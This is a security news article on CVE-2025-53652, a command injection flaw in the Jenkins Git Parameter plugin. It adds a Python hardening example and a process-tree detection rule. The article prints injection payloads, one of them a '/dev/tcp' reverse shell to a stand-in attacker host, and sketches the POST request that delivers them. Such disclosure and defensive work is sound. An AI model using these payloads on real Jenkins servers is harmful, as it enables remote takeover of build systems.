15,000 Jenkins Servers With Vulnerable Git Parameter Plugin Enables Command Injection

A critical security vulnerability affecting thousands of Jenkins servers worldwide has emerged as a significant threat to enterprise infrastructure.

CVE-2025-53652, initially classified as medium severity, affects the widely-used Git Parameter plugin and enables attackers to execute arbitrary commands on vulnerable systems.

The vulnerability stems from insufficient input validation in parameter definitions, allowing malicious actors to inject commands that are later executed directly in shell environments.

The scope of this vulnerability is particularly concerning given Jenkins’ widespread adoption in DevOps environments.

According to internet scanning data, approximately 15,000 Jenkins servers appear to allow unauthenticated access, making remote code execution viable without requiring valid credentials.

This configuration significantly amplifies the potential impact, as attackers can exploit these systems without traditional authentication barriers.

VulnCheck researchers determined that the vulnerability’s true severity extends far beyond its initial medium rating.

The security flaw allows attackers to inject arbitrary values in Git parameters, which are subsequently processed by Git commands without proper sanitization.

This creates a direct pathway for command injection attacks, transforming what appeared to be a parameter injection issue into a critical remote code execution vulnerability.

The attack mechanism relies on Git’s versatility as a GTFOBin, enabling creative exploitation techniques.

When an attacker provides malicious input such as $(sleep 80) as a branch parameter, the injected command appears in the Git execution chain.

The vulnerable code path processes this input during Git operations, specifically in commands like git rev-parse --resolve-git-dir, where the malicious payload gets executed by the underlying shell.

Technical Exploitation Mechanics

The exploitation process demonstrates the vulnerability’s practical impact through command injection techniques.

When a Jenkins job processes a Git parameter, the system constructs shell commands incorporating user-supplied values without adequate validation.
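The root cause described above is a parameter value reaching a shell-interpreted command string. The following is an added example written for this article, not code from the Git Parameter plugin (which is written in Java); it shows the same pattern generically in Python: the risky string-splice construction next to a hardened version that allow-lists the ref name and hands Git an argument vector so no shell ever parses the value. The regex, the helper names and the sample inputs are this example's own assumptions.

```python
import re
import shlex
import subprocess

# Conservative allow-list for branch/tag parameters (an assumption of this
# example; real Git refnames permit more, see `git check-ref-format`). The
# first character must be alphanumeric, which also rules out option-looking
# values such as "--upload-pack=...", and no shell metacharacter is permitted,
# so "$(sleep 80)" never passes.
_SAFE_REF = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,254}")


def validate_ref(value: str) -> str:
    """Return `value` unchanged if it is an acceptable ref name, else raise."""
    if not _SAFE_REF.fullmatch(value):
        raise ValueError(f"rejected ref parameter: {value!r}")
    # Extra refname rules: no "..", no "//", no trailing "/" or ".lock".
    if ".." in value or "//" in value or value.endswith(("/", ".lock")):
        raise ValueError(f"rejected ref parameter: {value!r}")
    return value


def vulnerable_command(branch: str) -> str:
    """The risky pattern: the raw parameter spliced into a shell string.

    Only returned here, never executed. Run through a shell, the "$(...)"
    in the value would be expanded before git ever saw it.
    """
    return f"git rev-parse --verify {branch}"


def safe_shell_string(branch: str) -> str:
    """If a shell string is unavoidable, quote the value so it stays literal."""
    return "git rev-parse --verify " + shlex.quote(branch)


def hardened_argv(branch: str) -> list:
    """Preferred form: validated value in an argv list, no shell involved."""
    return ["git", "rev-parse", "--verify", validate_ref(branch)]


def resolve_ref(branch: str, repo_dir: str) -> str:
    """Resolve a branch parameter inside `repo_dir` without a shell."""
    result = subprocess.run(
        hardened_argv(branch), cwd=repo_dir, shell=False,
        capture_output=True, text=True, check=False,
    )
    return result.stdout.strip()


if __name__ == "__main__":
    # Constructed inputs: one legitimate branch, then values a validator must reject.
    for candidate in ["release/2025.1", "$(sleep 80)", "--upload-pack=x", "a..b"]:
        try:
            print("accepted:", hardened_argv(candidate))
        except ValueError as exc:
            print("blocked: ", exc)
    print("quoted form:", safe_shell_string("$(sleep 80)"))
```

The argv form is the fix to prefer: with `shell=False` the value is delivered to Git as a single argument and command substitution is not a concept that applies. The allow-list is defence in depth against Git-level surprises (option injection, odd refnames), which is why it rejects a leading dash even though the shell is out of the picture.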

Figure: Plugin warning (Source: VulnCheck)

For instance, a malicious parameter value like $(bash -c "bash >&/dev/tcp/attacker_ip/port <&1") can establish reverse shell connections, granting attackers complete system access.

The attack requires three key components: the target build name, a valid session cookie, and a Jenkins-Crumb CSRF token.

Attackers can obtain these prerequisites through simple reconnaissance requests to the Jenkins instance. Once acquired, exploitation proceeds via HTTP POST requests to the /job/[buildName]/build endpoint, embedding the malicious payload within the parameter structure.

Process monitoring reveals that Git operations spawn child processes executing the attacker-supplied commands, confirming successful code execution with jenkins user privileges.
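The process-tree observation above is a usable detection: under normal operation the Git processes a Jenkins controller or agent spawns do not themselves launch a shell. The following is an added example, not from the article or from VulnCheck, that runs that rule over a constructed set of process events shaped like EDR or auditd telemetry (pid, ppid, user, executable, command line). The event records, the `jenkins` user name and the executable lists are assumptions made for the example; the lists of shells and network tools should be tuned to what a given environment considers normal.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    user: str
    comm: str      # executable name as reported by the sensor
    cmdline: str   # full command line


# Constructed sample telemetry for one Jenkins host (not real captured data).
# 4202 is the only process that a benign Git invocation would not produce.
SAMPLE_EVENTS = [
    ProcEvent(4100, 1,    "jenkins", "java", "java -jar /usr/share/jenkins/jenkins.war"),
    ProcEvent(4201, 4100, "jenkins", "git",  "git rev-parse --resolve-git-dir /var/lib/jenkins/workspace/app/.git"),
    ProcEvent(4202, 4201, "jenkins", "sh",   "sh -c sleep 80"),
    ProcEvent(4203, 4202, "jenkins", "sleep", "sleep 80"),
    ProcEvent(4300, 4100, "jenkins", "git",  "git fetch --tags origin"),
    ProcEvent(4301, 4300, "jenkins", "git-remote-https", "git-remote-https origin https://example.invalid/app.git"),
    # An ordinary build-step shell: its parent is the Jenkins JVM, not git.
    ProcEvent(4400, 4100, "jenkins", "sh",   "sh -xe /tmp/jenkins1234567890.sh"),
]

# Children of git that warrant a look. Git's own helpers (git-remote-*,
# ssh, credential helpers) are deliberately absent from these sets.
SHELLS = {"sh", "bash", "dash", "zsh"}
NETWORK_TOOLS = {"nc", "ncat", "curl", "wget", "python", "python3", "perl"}


def ancestry(event: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Executable names from the event up to the root, for analyst context."""
    chain, cur = [], event
    while cur is not None:
        chain.append(cur.comm)
        cur = by_pid.get(cur.ppid)
    return chain


def shell_children_of_git(events: List[ProcEvent], user: str = "jenkins") -> List[ProcEvent]:
    """Flag a shell or network tool whose direct parent is a git process.

    The user filter scopes the rule to the CI service account so that an
    engineer's interactive git usage on the same box does not alert.
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or e.user != user:
            continue
        if parent.comm == "git" and e.comm in SHELLS | NETWORK_TOOLS:
            hits.append(e)
    return hits


if __name__ == "__main__":
    by_pid = {e.pid: e for e in SAMPLE_EVENTS}
    for hit in shell_children_of_git(SAMPLE_EVENTS):
        print(f"pid {hit.pid}: {hit.cmdline!r} via {' <- '.join(ancestry(hit, by_pid))}")
```

A hit is worth correlating with the Jenkins access log for the matching `POST /job/<name>/build` request and the parameter value it carried; the `ancestry` chain (`sh <- git <- java`) is what distinguishes this from a build step that legitimately runs a shell under the JVM.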


The post 15,000 Jenkins Servers With Vulnerable Git Parameter Plugin Enables Command Injection appeared first on Cyber Security News.